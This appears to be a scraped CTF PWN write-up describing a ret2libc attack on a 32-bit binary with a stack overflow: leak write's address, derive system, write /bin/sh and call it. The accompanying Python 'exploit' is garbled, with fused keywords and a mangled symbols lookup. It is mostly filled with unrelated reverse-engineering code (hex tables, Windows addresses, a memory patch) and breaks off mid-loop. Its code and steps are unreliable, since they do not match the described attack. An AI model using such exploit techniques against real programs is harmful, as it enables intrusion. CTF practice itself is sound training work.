This is a relatively simple PWN topic. First, drag it into IDA and have a simple look at the program, as shown in the figure.
It is found that when reading, there is no stack protection. Therefore, when reading 0x34, it is possible to replace the game return address, and first pass write(1,write,4)(game as the write return address). Read the write address in this way, so that you can get the system address, because it runs circularly again, and also write /bin/sh in 0x804A06C, so that the system can run.
Pythonexp is as follows:
frompwn import *
defrungameAgainPoc(p,yourname,flag):
p.recvuntil("First,what's your name? ")
p.send(yourname+ " ")
p.recvuntil("doyou want to get flag? ")
p.send(flag)
pwnelf= ELF("./pwn")
libcelf= ELF("./libc-2.23.so")
gameadd= 0x080485CB
plt_write= pwnelf.symbols
#[ebp+var_6C]01050D02070106010206000B07010C06
#[ebp+var_4C]02080602
#[ebp+var_5C]0100070D020108080D000103040D0303
#[ebp+var_48]02050009
#[ebp+var_44]00000D02
defcover(buf):
buf= buf.decode("hex")
rbuf= ""
fori in range(len(buf) - 1,-1,-1):
rbuf+= buf[i]
returnrbuf
defcover_hex_lines(buf):
returnbuf.replace("","").replace("","").replace(" ","").decode("hex")
var_6c=cover("01050D02070106010206000B07010C06")
+cover("0100070D020108080D000103040D0303")
+cover("02080602") + cover("02050009")
+cover("00000D02")
#printlen(var_6c)
byte_402178= """02 02 02 02 03 01 01 02
0101 02 01 01 00 01 01 02 02 00 01 01 01 01 00
0101 02 02 00 01 01 02 02 01 01 01 01 01 02 01
0103 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0303 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01
060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01
0000 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00
4800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00
EF28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00
2C23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B
0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 00
4017 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00
0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 30 40 00
E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 00
0000 00 00 00 00 00 00 00 01 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00"""
.replace("","").replace("","").replace(" ","").decode("hex")
byte_402138= """00 00 00 00 01 00 00 00
0200 00 00 03 00 00 00 04 00 00 00 05 00 00 00
0600 00 00 07 00 00 00 08 00 00 00 09 00 00 00
0A00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00
0E00 00 00 0F 00 00 00"""
.replace("","").replace("","").replace(" ","").decode("hex")
dword_403018="""0200 00 00 02 00 00 00
0200 00 00 02 00 00 00 00 00 00 00 00 00 00 00
""".replace("","").replace("","").replace(" ","").decode("hex")
#text:0040110E mov ecx, [ebp+var_4]
#.text:00401111 xor ecx, ebp
#.text:00401113 mov dword_40301C, 3
#.text:0040111D mov dword_403020, 6
#.text:00401127 mov dword_403024, 7
# The memory value has changed, so modify it.
dword_403018= dword_403018[0:4] + 'x03' + dword_403018[5:8]
+'x06' + dword_403018[9:12] + 'x07'
+dword_403018[13:]
printdword_403018.encode("hex")
fori in range(0,42):
hightnum= ord(dword_403018[ord(byte_402178[i])*4])
Copyright Description:No reproduction without permission。
Knowledge sharing community for developers。
Let more developers benefit from it。
Help developers share knowledge through the Internet。
Follow us
Español
Português